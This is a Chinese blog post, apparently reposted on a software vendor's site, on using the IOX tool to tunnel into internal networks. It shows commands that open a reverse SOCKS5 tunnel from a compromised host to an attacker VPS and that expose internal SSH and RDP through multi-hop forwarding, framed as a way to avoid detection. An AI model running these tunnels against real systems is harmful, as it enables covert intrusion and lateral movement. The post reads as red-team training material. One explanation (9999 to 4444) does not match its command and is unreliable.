LOGO OA教程 ERP教程 模切知识交流 PMS教程 CRM教程 开发文档 其他文档  
 
网站管理员

IOX实战端口转发与Socks代理详解

admin
2025年10月7日 23:36 本文热度 18

在内网渗透中,如何稳定地从外网访问到内网资源是贯穿信息收集、漏洞利用、横向移动、数据回传等各阶段的核心问题。今天介绍的 IOX 工具,体积小、功能强,支持多种端口转发和 SOCKS5 代理,是攻防对抗中极具实用性的“网络隧道搭建利器”。


IOX 工具简介
IOX 是一款基于 Go 开发的轻量代理和转发工具,具备以下特点:

  • 跨平台(支持 Linux / Windows / Mac)
  • 支持 SOCKS5、TCP 端口转发
  • 命令行简单,易于自动化
  • 体积小,部署隐蔽性高
  • 在红队实战、内网维权、内网穿透中都极具价值。



搭建 SOCKS5 代理链
目标场景:
假设目标内网中存在一台被控主机,我们希望利用它来访问更多内网资产,同时把流量转发到自己的 VPS 做出站代理。
第一步:在被控 Linux 主机上运行
./iox proxy -r 49.232.134.151:9999
含义:
-r 表示远程连接到 VPS 的 9999 端口
被控主机会向 VPS 建立一个持久连接,充当流量通道
第二步:在 VPS 上运行
./iox proxy -l 9999 -l 1080
含义:
-l 表示监听本地 9999 端口接收来自被控主机的连接
同时将流量映射到本地 1080 端口,提供 SOCKS5 服务
此时,只需要把你的浏览器或者 proxychains 配置成走 VPS 的 1080 SOCKS5,就可以透明访问被控主机所在内网的任何目标。


端口转发实用
把内网 22 端口暴露到公网
./iox fwd -r 192.168.78.134:22 -r 49.232.134.151:9999
此命令会把本地的 9999 端口转发到 4444 端口,常用于本地调试、多级代理或者对链式隧道做中继。


多层级端口转发的思路
在更复杂的环境里,可能会存在多跳代理,IOX 的 fwd 也可多次叠加使用。例如先把 3389 转发到内网的一台跳板机,再由跳板机转发到外部 VPS,从而形成完整的多级链路,降低被检测的风险。
rdesktop 192.168.100.99


总结
IOX 不仅支持基础的端口映射操作,还提供了对 SOCKS5 协议的强大支持,可与 proxychains、rdesktop、VNC 等工具无缝联动,适用于多种内网渗透场景。无论是从外网打入内网进行横向移动,还是通过代理链进行远程控制访问,IOX 都能稳定、高效地完成任务。在攻防演练、红队行动中,IOX 就像一把万能钥匙,轻松打通内网通路,为后续控制与数据流转提供了坚实的通信基础,真正做到了“隐蔽、可靠、灵活”。


阅读原文:原文链接


该文章在 2025/10/9 13:20:48 编辑过
关键字查询
相关文章
正在查询...
点晴ERP是一款针对中小制造业的专业生产管理软件系统,系统成熟度和易用性得到了国内大量中小企业的青睐。
点晴PMS码头管理系统主要针对港口码头集装箱与散货日常运作、调度、堆场、车队、财务费用、相关报表等业务管理,结合码头的业务特点,围绕调度、堆场作业而开发的。集技术的先进性、管理的有效性于一体,是物流码头及其他港口类企业的高效ERP管理信息系统。
点晴WMS仓储管理系统提供了货物产品管理,销售管理,采购管理,仓储管理,仓库管理,保质期管理,货位管理,库位管理,生产管理,WMS管理系统,标签打印,条形码,二维码管理,批号管理软件。
点晴免费OA是一款软件和通用服务都免费,不限功能、不限时间、不限用户的免费OA协同办公管理系统。
Copyright 2010-2025 ClickSun All Rights Reserved